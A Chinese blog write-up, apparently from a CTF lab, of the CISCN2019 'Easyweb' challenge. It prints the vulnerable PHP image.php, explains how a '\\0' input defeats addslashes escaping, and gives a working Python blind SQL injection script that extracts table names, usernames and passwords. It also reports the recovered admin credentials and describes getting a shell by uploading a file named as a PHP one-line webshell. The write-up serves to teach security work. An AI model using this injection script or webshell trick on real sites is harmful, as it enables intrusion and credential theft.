[CISCN2019 总决赛 Day2 Web1]Easyweb

已于 2022-04-03 15:58:54 修改
阅读量1k 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全 php sql
于 2022-04-03 13:44:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/123935879
版权 
知识点:sql盲注,转义字符

应该是获得usrename的值,看看有没有注册页面register.php
在这里插入图片描述
然而并没有,尝试sql注入,注了半天啥反应都没有。
跑下目录看一下,试试,可以看到有两个页面有反应,robots.txtimage.php
在这里插入图片描述
提示:.php.bak,image.php.bak可以拿到源码。
在这里插入图片描述

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
?>

我们的目标肯定是使得这句能够执行我们的查询语句:

id='{$id}' or path='{$path}'");

先看这段,会把一些字符赋值空:且\0,实际上是\0,因为第一个斜杠实际上是对第二个斜杠的转义,也就是说可以利用替换达成我们的目的。

在这里插入图片描述
再看这段

addslashes:该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。
这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(null 字符)。

在这里插入图片描述
举个例子

<?php
    $id = "\\0";
    echo $id.'<br>';
    $id = addslashes($id);
    echo $id.'<br>';
    $id=str_replace(array("\\0","%00","\\'","'"),"",$id);
    echo $id.'<br>';
?>

显示先传入变量id值为\\0,先被转义为\0,再经过addslashes()的处理,变量id="\\0",最后经过str_replace()的替换,变为\
在这里插入图片描述
也就是说此时sql语句为id={' \' or path='} {$path}');,我们可以再path处构造盲注。

import requests


url = 'http://dc915e1f-f867-4a5a-bb60-2dd2708768c5.node4.buuoj.cn:81//image.php?id=\\0&path=or 1='
flag = ''
name = ''

for i in range(1, 50):
    for j in range(127, 0, -1):
        #爆表
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() ),%d,1))=%d,1,-1)%%23' % (i, j)

        #爆字段因为过滤了'和"所以用16进制代替表名user
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 ),%d,1))=%d,1,-1)%%23' % (i, j)

        #爆username值
        #payload = 'if(ascii(substr((select group_concat(username) from users),%d,1))=%d,1,-1)%%23' % (i, j)

        #爆password值
        payload = 'if(ascii(substr((select group_concat(password) from users),%d,1))=%d,1,-1)%%23' % (i, j)
        r = requests.get(url+payload)
        #因为当成功时会返回图片,可以以此来判断。
        if "JFIF" in r.text:
            name += chr(j)
            print(name)
            break

得到账户密码:

admin
bc876077ef9ba9903c37

登录可以看到是一个上传页面,随便传个文件,告诉我们会把文件名写入到日志中所以我们只要上传一个文件名为一句话木马的文件就行了
在这里插入图片描述

在这里插入图片描述
最后getshell就行了。
在这里插入图片描述

succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CISCN2019 总决赛 Day2 Web1】-Easy web
xixihahawuwu的博客
11-28 784
进入环境是一个登录界面检查页面元素没有发现啥,我们把源码下载下来看看先看config文件 是一个数据库文件 数据库名为ciscnfinal 接着看function文件 我们可以看到有关登录界面的还有两个函数方法 看image文件Get传递两个参数 把一些字符替换成空Addslashes()函数会把一些特殊的字符转义,比如单引号转为\’,\转为\其他的看了下,没有什么信息就过掉了 我们看下upload文件要求我们用户名必须为admin 这里我们可以获得用户名admin在user文件中我们可以知道成功登陆后的.
CISCN2024-Web方向题解
最新发布
Err0r233的博客
05-21 1796
CISCN打烂了,几个题都是差一点就出,自己还是太菜了。
[CISCN2019 总决赛 Day2 Web1]Easyweb ----不会编程的崽
不会编程的崽的博客
03-21 690
sql注入 文件上传
【CTF】2023Ciscn WEB方向题解
Sapphire037的博客
05-29 2421
比赛体验一般,一黑灯基本上题都烂掉。
[2023CISCN]国赛初赛WEB题目复现
qq_42585535的博客
10-23 567
最近几个月在学免杀,JAVA安全以及JS相关内容,导致CTF摆了很久,这次复现国赛题目就当做恢复训练了。
CMS程序EasyWeb 1.5 UTF-8-web1.5.zip
03-09
2. **多语言支持**:由于采用UTF-8编码,EasyWeb 1.5能够处理多种语言,适合全球化网站。 3. **SEO优化**:提供元标签编辑和友好的URL结构,有利于搜索引擎抓取和排名。 4. **用户管理**:允许创建不同角色的用户...
迷你最小的web服务器easyweb
03-05
迷你最小的Web服务器EasyWeb是一款轻量级的网络应用程序,专为快速搭建本地Web环境而设计。它以其小巧的体积和简易的操作性受到许多初学者和开发者们的喜爱。这款服务器无需复杂的安装过程,只需解压即可运行,非常...
layui easyweb iframe v3.1.8源码
12-08
[增加] 增加fixed方式的select,可用在表格、滚动弹窗中 [增加] 增加动态模板功能 [增加] 主页工作台、控制台的内容进行了补充完善 ...[增加] loading风格增加了一个layui简约样式 ...[优化] 切换tab自动刷新支持每个子...
EasyWeb iframe多标签版-混淆版源码
01-03
EasyWeb iframe多标签版-混淆版源码 使用说明: 1、使IDEA、Hbuilder、浏览器等开发工具打开; 2、使用http://localhost的形式访问; 3、不能直接双击以file://的形式访问; 4、开发文档:...
EasyWeb便携式WEB服务器软件
08-03
总的来说,EasyWeb便携式WEB服务器软件是个人用户、小型团队或教育环境中快速搭建服务器的理想选择,它简化了WEB服务的部署和管理,提高了工作效率,并且在有限的资源下仍能提供稳定的性能。通过了解和掌握EasyWeb的...
BUU CTF[CISCN2019 总决赛 Day2 Web1]Easyweb 1
weixin_46245411的博客
06-16 765
文章目录前言一、源码审计二、开始冻手1.伪造Cookie2.上传文件3.getshell总结 前言 没赶上2019CISCN比赛,只能在BUU看到前人大佬们的荣光~ 不是很清楚BUU附属的源码是不是与比赛题目所给的一样,如果一样的话,我看其他大佬的WP都有BOOL盲注的出现,但是我直接审计源码绕过了SQL注入了,所以很好奇是不是有什么差异~ 所以我仅说说我解BUU的过程 一、源码审计 个人审计用到的几个比较重要源码:upload.php、config.php、function.php、user.p..
[CISCN2019 总决赛 Day2 Web1]Easyweb1
Mrs_H的博客
10-22 506
一.前言 在之前的文章中我提到最近一直在做sql注入相关的东西,也在一直做sql注入有关的题目。但是,事实上很多赛题他们的考点并不单一,往往需要结合着其他的知识,才能够拿到想要的结果。下面这道题就是我刚才所说的典型,虽然考的不难,但是足够说明当前sql题目的走向了。 二.正文 我们首先打开环境看到如下页面。 emmm,一个花里胡哨的登陆界面。尝试输入了很多用户名和密码组合,但是都不对。那就去扫一下目录,发现该网站存在一个robots.txt 这个robots文件中的内容就是在提示我们,该网站含有备份文件
buuctf-[CISCN2019 总决赛 Day2 Web1]Easyweb
m0_62094846的博客
05-18 716
扫描目录 得到*.php.bak 尝试*表示的东西, index,flag之类的都没用 有image.php,顺便可以看到可能的注入点 下载下了备份文件 <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=addslashes($path); ...
CISCN 华北赛区 Day1 Web2
kid的博客
06-14 2579
CISCN 华北赛区 Day1 Web2 前言 关注大佬的博客看到大佬又做了一道有意思的题还提供了环境,这里来体验下。 一看这个网站就很有意思…最近黑kunkun的可真多,前面0708那个漏洞github搜exp,下下来一运行 ,输出你打篮球真的很像CXK…过分…你打篮球才像CXK,你们全家打篮球都像CXK! 复现环境:https://github.com/CTFTraining/CISCN...
[CISCN2019 华北赛区 Day2 Web1]Hack World
pakho_C的博客
02-12 1837
web第31题 [CISCN2019 华北赛区 Day2 Web1]Hack World 打开靶场: 提示了flag表中有flag列,我们只能提交id 提交1 地址栏中无参数,说明是post方式传参 提交2 3以及后面的就没有了,说明只有2条数据 尝试1’ 说明类型是数字 手动测试一下有无过滤,试了常规的猜解字段等方式,发现有过滤 FUZZ跑一下 相应为482的都是被过滤的字符 例如空格,or,order,union以及报错注入的相关字符都被过滤了 但是select和from没有被过滤 这时我
[ciscn2019 总决赛 day2 web1]easyweb
03-16
ciscn2019 总决赛 day2 web1 easyweb 是一道Web安全题目,需要使用SQL注入技术来解决。 首先,我们需要在登录页面中输入用户名和密码。然后,我们可以通过在用户名和密码字段中输入一些SQL注入语句来尝试绕过验证...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值